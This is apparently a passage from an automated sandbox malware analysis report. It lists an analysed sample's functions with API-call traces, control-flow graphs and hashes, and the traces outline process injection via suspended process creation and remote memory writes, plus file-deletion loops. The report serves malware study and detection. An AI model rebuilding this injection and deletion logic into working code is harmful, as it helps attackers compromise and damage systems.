5741->5746 5743 1c2a8a DeleteFileA 5743->5746 5744 1c2ace DeleteFileA 5744->5746 5745 1c2b34 Sleep 5745->5746 5746->5743 5746->5744 5746->5745 5747 1c2b1e DeleteFileA 5746->5747 5748 1c2b4d 5746->5748 5747->5745 5750 1c2b5e 5748->5750 5749 1c2c41 Sleep 5749->5749 5749->5750 5750->5749 5752 1c2cf7 5750->5752 5753 1c2c99 5750->5753 5752->5746 5756 1c2b5e 5753->5756 5754 1c2cf7 5754->5750 5755 1c2c41 Sleep 5755->5755 5755->5756 5756->5753 5756->5754 5756->5755 5887 1c0b6b GetWindowThreadProcessId OpenProcess 5888 1c0bac 5887->5888 5889 1c0b8e 5887->5889 5890 1c08b3 29 API calls 5888->5890 5889->5888 5893 1c0ba4 ExitProcess 5889->5893 5891 1c0bb1 5890->5891 5892 1c0c3f GetPEB 5891->5892 5894 1c0bb6 5892->5894 5757 1c4d25 5758 1c4d4e 5757->5758 5759 1c4d32 5757->5759 5759->5758 5760 1c4d44 SetEvent 5759->5760 5760->5758 5956 2300b8f 5957 2300ba1 OpenProcess 5956->5957 5958 2300bd0 5957->5958 5962 2300bb2 5957->5962 5959 23008d7 3 API calls 5958->5959 5960 2300bd5 5959->5960 5961 2300c63 GetPEB 5960->5961 5964 2300bda 5961->5964 5962->5958 5963 2300bc8 ExitProcess 5962->5963

                                                                                                                                                                Executed Functions

                                                                                                                                                                Function 02300005 Relevance: 2.6, APIs: 1, Instructions: 1116COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 0230098B: OpenMutexA.KERNEL32(001F0001,00000000,00000000), ref: 023009A5
                                                                                                                                                                  • Part of subcall function 0230098B: GetStartupInfoA.KERNEL32(00000000), ref: 023009BD
                                                                                                                                                                • ExitProcess.KERNEL32(00000000), ref: 0230001D
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.1851135564.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2300000_bin.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ExitInfoMutexOpenProcessStartup
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 213680645-0
                                                                                                                                                                • Opcode ID: 8ded0c1563596ef065c873257d9f166c149bbeaf12971adc1d4101d8be03d7fe
                                                                                                                                                                • Instruction ID: e88d9ea6772d2559f086bc209dda1c598bc75ae7dcc9f24fe32f086cfc4925e1
                                                                                                                                                                • Opcode Fuzzy Hash: 8ded0c1563596ef065c873257d9f166c149bbeaf12971adc1d4101d8be03d7fe
                                                                                                                                                                • Instruction Fuzzy Hash: B272CF6141E3C45FD72F9B604AF9B667F79AF03208B1A10CBD581DA0F3D6249A09C77A
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 021F0000 Relevance: 21.4, APIs: 3, Strings: 9, Instructions: 395memoryCOMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.1850846800.00000000021F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021F0000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_21f0000_bin.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ProtectVirtual
                                                                                                                                                                • String ID: $1;$@$C[$R$d:$wJ$y7$v
                                                                                                                                                                • API String ID: 544645111-3459585926
                                                                                                                                                                • Opcode ID: 53f4e89c0dc9a16f3c8cd647b3aa6a18b2ce076b07f4b3090f74fc473a9225f3
                                                                                                                                                                • Instruction ID: 28e5be904831581971660279813b2c29e89ec9c6c7ba3c7a11617b115dd6d7d6
                                                                                                                                                                • Opcode Fuzzy Hash: 53f4e89c0dc9a16f3c8cd647b3aa6a18b2ce076b07f4b3090f74fc473a9225f3
                                                                                                                                                                • Instruction Fuzzy Hash: 9F3277B8E012688BDB64CF68C890BDDBBB1BF49304F1481DAD848A7341D775AE85CF95
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 001C093E Relevance: 18.1, APIs: 12, Instructions: 134sleepthreadCOMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                APIs
                                                                                                                                                                • Sleep.KERNEL32(00001388), ref: 001C0959
                                                                                                                                                                • RtlExitUserThread.NTDLL(00000000), ref: 001C0961
                                                                                                                                                                • OpenMutexA.KERNEL32(001F0001,00000000,00000000), ref: 001C0981
                                                                                                                                                                • GetStartupInfoA.KERNEL32(00000000), ref: 001C0999
                                                                                                                                                                  • Part of subcall function 001C09D9: CreateProcessA.KERNEL32(00000000,001C09D2,00000007,E8FFFF1F,E8FFFBFB,00000000,00000000,00000000,00000004,00000000,00000000,E8FFFC3F,00000000), ref: 001C09E0
                                                                                                                                                                  • Part of subcall function 001C09D9: GetThreadContext.KERNEL32(?,00000000), ref: 001C0A08
                                                                                                                                                                  • Part of subcall function 001C09D9: VirtualProtectEx.KERNEL32(?,?,000000EB,00000040,00000000), ref: 001C0A33
                                                                                                                                                                  • Part of subcall function 001C09D9: DuplicateHandle.KERNEL32(000000FF,000000FF,?,001C5810,00000000,00000000,00000002), ref: 001C0A78
                                                                                                                                                                  • Part of subcall function 001C09D9: WriteProcessMemory.KERNEL32(?,?,?,000000EB,00000000), ref: 001C0AA6
                                                                                                                                                                  • Part of subcall function 001C09D9: ResumeThread.KERNEL32(?), ref: 001C0AB6
                                                                                                                                                                  • Part of subcall function 001C09D9: Sleep.KERNEL32(000003E8), ref: 001C0AC6
                                                                                                                                                                  • Part of subcall function 001C09D9: OpenMutexA.KERNEL32(001F0001,00000000,00000000), ref: 001C0ADD
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.1849278691.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_1c0000_bin.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Thread$MutexOpenProcessSleep$ContextCreateDuplicateExitHandleInfoMemoryProtectResumeStartupUserVirtualWrite
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1099281029-0
                                                                                                                                                                • Opcode ID: 0e1f2a4e7413688aa54805ed2a14ac9b83cd4127bce701e40c3c8803db53eeff
                                                                                                                                                                • Instruction ID: 02247e30dbf509db19e564959b2d0d53da4b464b58ceeb9d9e50b48634e6cc8b
                                                                                                                                                                • Opcode Fuzzy Hash: 0e1f2a4e7413688aa54805ed2a14ac9b83cd4127bce701e40c3c8803db53eeff
                                                                                                                                                                • Instruction Fuzzy Hash: E7517031644354AFEF239F20CC85F9A77B8AF14B44F040199BA49FE0D6DBB0DA94CA65
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 001C3F0D Relevance: 6.0, APIs: 4, Instructions: 26sleepCOMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                APIs
                                                                                                                                                                • GetModuleHandleA.KERNEL32(00000000,00000000,?,001C3F03,0000000A,E8FFFF1B,00000000,0000000A), ref: 001C3F2D
                                                                                                                                                                • Sleep.KERNELBASE(000003E8,00000000,?,001C3F03,0000000A,E8FFFF1B,00000000,0000000A), ref: 001C3F4B
                                                                                                                                                                • Sleep.KERNEL32(000007D0), ref: 001C3F5B
                                                                                                                                                                • Sleep.KERNEL32(00000BB8), ref: 001C3F6B
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.1849278691.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_1c0000_bin.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Sleep$HandleModule
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3646095425-0
                                                                                                                                                                • Opcode ID: 550d547703b1faf33bdbb28134adf901e3b34dfa1c128e3e0b52710aeb13400a
                                                                                                                                                                • Instruction ID: 634a74a46434a642e0226302b98b7da89e65e1ed753664d014aab6768df5a327
                                                                                                                                                                • Opcode Fuzzy Hash: 550d547703b1faf33bdbb28134adf901e3b34dfa1c128e3e0b52710aeb13400a
                                                                                                                                                                • Instruction Fuzzy Hash: EFF05E60988244A6EF413BB0884AF4D36B45F31705F04889CBA59E90D2CF30C6508E72
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 001C1345 Relevance: 4.6, APIs: 3, Instructions: 61memoryCOMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 53 1c1345-1c1352 54 1c1358-1c135e 53->54 55 1c13eb-1c13ec 53->55 54->55 56 1c1364-1c137a VirtualProtect 54->56 56->55 57 1c137c-1c138f VirtualAlloc 56->57 57->57 58 1c1391-1c1398 57->58 59 1c139b-1c13ab call 1c0e7c 58->59 62 1c13ad-1c13e5 VirtualProtect 59->62 62->55
                                                                                                                                                                APIs
                                                                                                                                                                • VirtualProtect.KERNELBASE(?,00000020,00000040,?), ref: 001C1372
                                                                                                                                                                • VirtualAlloc.KERNELBASE(00000000,00000020,00003000,00000040), ref: 001C1387
                                                                                                                                                                • VirtualProtect.KERNELBASE(?,00000020,?,?), ref: 001C13E5
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.1849278691.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_1c0000_bin.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Virtual$Protect$Alloc
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2541858876-0
                                                                                                                                                                • Opcode ID: e6710b313372bdb89baaa3f3abf609e97fcf4defd94341f28ea73213f73bc76a
                                                                                                                                                                • Instruction ID: 24bdabae7abb68ff9a17f5ee70b33f63d9b304115b88680595e81b57cc4b6d8c
                                                                                                                                                                • Opcode Fuzzy Hash: e6710b313372bdb89baaa3f3abf609e97fcf4defd94341f28ea73213f73bc76a
                                                                                                                                                                • Instruction Fuzzy Hash: C921AE31944256AFDB11DE78C844B5DBBB5AF05310F054219F955BB5D5D730E800CB94
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 02303409 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 511 2303409-2303462 GetVolumeInformationA call 2303634
                                                                                                                                                                APIs
                                                                                                                                                                • GetVolumeInformationA.KERNELBASE(02303405,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000104), ref: 02303409
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.1851135564.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2300000_bin.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: InformationVolume
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2039140958-0
                                                                                                                                                                • Opcode ID: 05df49bcbb0e52281ffeddc20694d7dcde29ca99da7d602d76b789caa7e7f337
                                                                                                                                                                • Instruction ID: 4901e963293465bf77e6bfb6c1d1e3ce31b88732ec8187fb5237d69e5b386d92
                                                                                                                                                                • Opcode Fuzzy Hash: 05df49bcbb0e52281ffeddc20694d7dcde29ca99da7d602d76b789caa7e7f337
                                                                                                                                                                • Instruction Fuzzy Hash: CBF0F875A00154DBEF12EF24C485A9A7BF8AF84344F4508C8AA4DBF206CA30A599CFA4
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Non-executed Functions

                                                                                                                                                                Function 02302951 Relevance: 13.7, APIs: 9, Instructions: 169filestringsleepCOMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                APIs
                                                                                                                                                                • LoadLibraryA.KERNEL32(02302949,00000008,?,00000000,02302835,00000000), ref: 02302956
                                                                                                                                                                • VirtualAlloc.KERNEL32(00000000,01400000,00003000,00000004), ref: 02302993
                                                                                                                                                                • lstrcat.KERNEL32(00000000,023029C1), ref: 023029D0
                                                                                                                                                                • lstrcat.KERNEL32(00000000,023029F8), ref: 02302A07
                                                                                                                                                                • lstrcat.KERNEL32(00000000,02302A2F), ref: 02302A3E
                                                                                                                                                                • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 02302AB8
                                                                                                                                                                • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 02302AFC
                                                                                                                                                                • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00A00000), ref: 02302B52
                                                                                                                                                                • Sleep.KERNEL32(000A012C,00000000,00000000,00000000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000), ref: 02302B66
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.1851135564.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2300000_bin.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: DeleteFilelstrcat$AllocLibraryLoadSleepVirtual
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 675344582-0
                                                                                                                                                                • Opcode ID: d011dff3c69ba8b3f7cae5bbaa392318d89e88feb0221dd9666ec9f6df8cf3c0
                                                                                                                                                                • Instruction ID: 144425e10782cc472dcfeb7a8a47d99c1872acf732bad165845db566bdb23e1e
                                                                                                                                                                • Opcode Fuzzy Hash: d011dff3c69ba8b3f7cae5bbaa392318d89e88feb0221dd9666ec9f6df8cf3c0
                                                                                                                                                                • Instruction Fuzzy Hash: E65153715002189EDB226F718DDCFAB77BDEF40705F4404A6AE85EA091EE309684CFB5
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 001C292D Relevance: 13.7, APIs: 9, Instructions: 169filestringsleepCOMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 554 1c292d-1c2943 call 1c3653 LoadLibraryA call 1c0c9c 558 1c2948-1c295f 554->558 560 1c2961-1c2977 VirtualAlloc 558->560 560->560 561 1c2979-1c299f call 1c25e8 call 1c29a6 560->561 566 1c2a07-1c2a1a call 1c3653 lstrcat 561->566 567 1c29a1-1c2a06 call 1c3653 lstrcat call 1c25e8 call 1c29dd call 1c3653 lstrcat call 1c2501 call 1c2a14 561->567 575 1c2a20-1c2a43 call 1c2b4d call 1c34f7 566->575 567->566 583 1c2a48-1c2a4f 575->583 583->575 585 1c2a51-1c2a6d call 1c343f call 1c2683 583->585 594 1c2a6f 585->594 595 1c2a9a-1c2ab1 call 1c2683 585->595 594->595 597 1c2a71-1c2a86 call 1c26f9 594->597 600 1c2ade-1c2af5 call 1c2683 595->600 601 1c2ab3 595->601 597->595 605 1c2a88 597->605 610 1c2af8-1c2b11 call 1c2e97 600->610 611 1c2af7 600->611 601->600 603 1c2ab5-1c2aca call 1c26f9 601->603 603->600 612 1c2acc 603->612 605->595 606 1c2a8a-1c2a94 DeleteFileA 605->606 606->595 616 1c2b34-1c2b48 Sleep 610->616 617 1c2b13-1c2b1c call 1c3057 610->617 611->610 612->600 615 1c2ace-1c2ad8 DeleteFileA 612->615 615->600 616->583 617->616 620 1c2b1e-1c2b2e DeleteFileA 617->620 620->616
                                                                                                                                                                APIs
                                                                                                                                                                • LoadLibraryA.KERNEL32(001C2925,00000008,?,00000000,001C2811,00000000), ref: 001C2932
                                                                                                                                                                • VirtualAlloc.KERNEL32(00000000,01400000,00003000,00000004), ref: 001C296F
                                                                                                                                                                • lstrcat.KERNEL32(00000000,001C299D), ref: 001C29AC
                                                                                                                                                                • lstrcat.KERNEL32(00000000,001C29D4), ref: 001C29E3
                                                                                                                                                                • lstrcat.KERNEL32(00000000,001C2A0B), ref: 001C2A1A
                                                                                                                                                                • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 001C2A94
                                                                                                                                                                • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 001C2AD8
                                                                                                                                                                • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00A00000), ref: 001C2B2E
                                                                                                                                                                • Sleep.KERNEL32(000A012C,00000000,00000000,00000000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000), ref: 001C2B42
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.1849278691.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_1c0000_bin.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: DeleteFilelstrcat$AllocLibraryLoadSleepVirtual
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 675344582-0
                                                                                                                                                                • Opcode ID: d011dff3c69ba8b3f7cae5bbaa392318d89e88feb0221dd9666ec9f6df8cf3c0
                                                                                                                                                                • Instruction ID: 5e20f8d1fd77fe1a3bbaf27d3d0f84e3a94bc46b39ba8ee9e7a75b819cd3b3af
                                                                                                                                                                • Opcode Fuzzy Hash: d011dff3c69ba8b3f7cae5bbaa392318d89e88feb0221dd9666ec9f6df8cf3c0
                                                                                                                                                                • Instruction Fuzzy Hash: 55513471500264AFDB227B608D49FAB77BCEF60705F0444AEFA45EB056DB74DA80CEA1
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 023009FD Relevance: 12.1, APIs: 8, Instructions: 76threadsleepprocessCOMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 703 23009fd-2300a0c call 2303677 CreateProcessA 706 2300b10 703->706 707 2300a12-2300a34 GetThreadContext 703->707 709 2300b15-2300b16 706->709 710 2300b10 call 2300b17 706->710 707->706 708 2300a3a-2300a5f VirtualProtectEx 707->708 708->706 711 2300a65-2300aa4 DuplicateHandle 708->711 710->709 711->706 712 2300aa6-2300ad2 WriteProcessMemory 711->712 712->706 713 2300ad4-2300ae0 ResumeThread 712->713 714 2300ae5-2300b09 Sleep OpenMutexA 713->714 714->709 715 2300b0b-2300b0e 714->715 715->706 715->714
                                                                                                                                                                APIs
                                                                                                                                                                • CreateProcessA.KERNEL32(00000000,023009F6,00000007,E8FFFF1F,E8FFFBFB,00000000,00000000,00000000,00000004,00000000,00000000,E8FFFC3F,00000000), ref: 02300A04
                                                                                                                                                                • GetThreadContext.KERNEL32(?,00000000), ref: 02300A2C
                                                                                                                                                                • VirtualProtectEx.KERNEL32(?,?,000000EB,00000040,00000000), ref: 02300A57
                                                                                                                                                                • DuplicateHandle.KERNEL32(000000FF,000000FF,?,02305834,00000000,00000000,00000002), ref: 02300A9C
                                                                                                                                                                • WriteProcessMemory.KERNEL32(?,?,?,000000EB,00000000), ref: 02300ACA
                                                                                                                                                                • ResumeThread.KERNEL32(?), ref: 02300ADA
                                                                                                                                                                • Sleep.KERNEL32(000003E8), ref: 02300AEA
                                                                                                                                                                • OpenMutexA.KERNEL32(001F0001,00000000,00000000), ref: 02300B01
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.1851135564.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2300000_bin.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ProcessThread$ContextCreateDuplicateHandleMemoryMutexOpenProtectResumeSleepVirtualWrite
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 617592159-0
                                                                                                                                                                • Opcode ID: 88fb36c18dc3a4afc247ee75a285c7b14497f4c37b797fc9ee23da592209a9b9
                                                                                                                                                                • Instruction ID: 69dd08cf07fa27ee5703da3eba7b901165e286f08368b27c8da302ae219137ae
                                                                                                                                                                • Opcode Fuzzy Hash: 88fb36c18dc3a4afc247ee75a285c7b14497f4c37b797fc9ee23da592209a9b9
                                                                                                                                                                • Instruction Fuzzy Hash: 86314F316402589FEF269F24CCD5BAA77B8AF04748F4805D4AA49FE0E5DBB0D690CE64
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 001C09D9 Relevance: 12.1, APIs: 8, Instructions: 76threadsleepprocessCOMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 689 1c09d9-1c09e8 call 1c3653 CreateProcessA 692 1c0aec call 1c0af3 689->692 693 1c09ee-1c0a10 GetThreadContext 689->693 697 1c0af1-1c0af2 692->697 693->692 694 1c0a16-1c0a3b VirtualProtectEx 693->694 694->692 696 1c0a3c-1c0a80 DuplicateHandle 694->696 696->692 699 1c0a82-1c0aae WriteProcessMemory 696->699 699->692 700 1c0ab0-1c0abc ResumeThread 699->700 701 1c0ac1-1c0ae5 Sleep OpenMutexA 700->701 701->697 702 1c0ae7-1c0aea 701->702 702->692 702->701
                                                                                                                                                                APIs
                                                                                                                                                                • CreateProcessA.KERNEL32(00000000,001C09D2,00000007,E8FFFF1F,E8FFFBFB,00000000,00000000,00000000,00000004,00000000,00000000,E8FFFC3F,00000000), ref: 001C09E0
                                                                                                                                                                • GetThreadContext.KERNEL32(?,00000000), ref: 001C0A08
                                                                                                                                                                • VirtualProtectEx.KERNEL32(?,?,000000EB,00000040,00000000), ref: 001C0A33
                                                                                                                                                                • DuplicateHandle.KERNEL32(000000FF,000000FF,?,001C5810,00000000,00000000,00000002), ref: 001C0A78
                                                                                                                                                                • WriteProcessMemory.KERNEL32(?,?,?,000000EB,00000000), ref: 001C0AA6
                                                                                                                                                                • ResumeThread.KERNEL32(?), ref: 001C0AB6
                                                                                                                                                                • Sleep.KERNEL32(000003E8), ref: 001C0AC6
                                                                                                                                                                • OpenMutexA.KERNEL32(001F0001,00000000,00000000), ref: 001C0ADD
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.1849278691.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_1c0000_bin.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ProcessThread$ContextCreateDuplicateHandleMemoryMutexOpenProtectResumeSleepVirtualWrite
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 617592159-0
                                                                                                                                                                • Opcode ID: 88fb36c18dc3a4afc247ee75a285c7b14497f4c37b797fc9ee23da592209a9b9
                                                                                                                                                                • Instruction ID: d08d0b8b2051c34f5721e4dda066ff8a6639c36971b334a2f4be7756b07d5326
                                                                                                                                                                • Opcode Fuzzy Hash: 88fb36c18dc3a4afc247ee75a285c7b14497f4c37b797fc9ee23da592209a9b9
                                                                                                                                                                • Instruction Fuzzy Hash: F0312F31640215AFEF239F14CC85FAA77B8AF14744F080199AA49FE0E5DBB0DA90CE54
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 023029CA Relevance: 10.6, APIs: 7, Instructions: 130sleepfilestringCOMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                APIs
                                                                                                                                                                • lstrcat.KERNEL32(00000000,023029C1), ref: 023029D0
                                                                                                                                                                  • Part of subcall function 02302A01: lstrcat.KERNEL32(00000000,023029F8), ref: 02302A07
                                                                                                                                                                  • Part of subcall function 02302A01: lstrcat.KERNEL32(00000000,02302A2F), ref: 02302A3E
                                                                                                                                                                  • Part of subcall function 02302A01: DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 02302AB8
                                                                                                                                                                  • Part of subcall function 02302A01: DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 02302AFC
                                                                                                                                                                • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00A00000), ref: 02302B52
                                                                                                                                                                • Sleep.KERNEL32(000A012C,00000000,00000000,00000000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000), ref: 02302B66
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.1851135564.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2300000_bin.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: DeleteFilelstrcat$Sleep
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 588723932-0
                                                                                                                                                                • Opcode ID: cf8439a9f46fc1c5678143b13b51c65cbdf78dca36166c9e79c3ab7667b2c553
                                                                                                                                                                • Instruction ID: 8c7ecd7ef5a995dec9c516901b010c65ee33d8830367745818e3f8d17e473c05
                                                                                                                                                                • Opcode Fuzzy Hash: cf8439a9f46fc1c5678143b13b51c65cbdf78dca36166c9e79c3ab7667b2c553
                                                                                                                                                                • Instruction Fuzzy Hash: 0B4120719002589EDB32AB718DDCEAF77BDEF40704F4044A5AE85EA091EE349684CFB5
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 001C29A6 Relevance: 10.6, APIs: 7, Instructions: 130sleepfilestringCOMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 716 1c29a6-1c2a1a call 1c3653 lstrcat call 1c25e8 call 1c29dd call 1c3653 lstrcat call 1c2501 call 1c2a14 call 1c3653 lstrcat 733 1c2a20-1c2a43 call 1c2b4d call 1c34f7 716->733 737 1c2a48-1c2a4f 733->737 737->733 738 1c2a51-1c2a6d call 1c343f call 1c2683 737->738 743 1c2a6f 738->743 744 1c2a9a-1c2ab1 call 1c2683 738->744 743->744 746 1c2a71-1c2a86 call 1c26f9 743->746 749 1c2ade-1c2af5 call 1c2683 744->749 750 1c2ab3 744->750 746->744 754 1c2a88 746->754 759 1c2af8-1c2b11 call 1c2e97 749->759 760 1c2af7 749->760 750->749 752 1c2ab5-1c2aca call 1c26f9 750->752 752->749 761 1c2acc 752->761 754->744 755 1c2a8a-1c2a94 DeleteFileA 754->755 755->744 765 1c2b34-1c2b48 Sleep 759->765 766 1c2b13-1c2b1c call 1c3057 759->766 760->759 761->749 764 1c2ace-1c2ad8 DeleteFileA 761->764 764->749 765->737 766->765 769 1c2b1e-1c2b2e DeleteFileA 766->769 769->765
                                                                                                                                                                APIs
                                                                                                                                                                • lstrcat.KERNEL32(00000000,001C299D), ref: 001C29AC
                                                                                                                                                                  • Part of subcall function 001C29DD: lstrcat.KERNEL32(00000000,001C29D4), ref: 001C29E3
                                                                                                                                                                  • Part of subcall function 001C29DD: lstrcat.KERNEL32(00000000,001C2A0B), ref: 001C2A1A
                                                                                                                                                                  • Part of subcall function 001C29DD: DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 001C2A94
                                                                                                                                                                  • Part of subcall function 001C29DD: DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 001C2AD8
                                                                                                                                                                • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00A00000), ref: 001C2B2E
                                                                                                                                                                • Sleep.KERNEL32(000A012C,00000000,00000000,00000000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000), ref: 001C2B42
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.1849278691.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
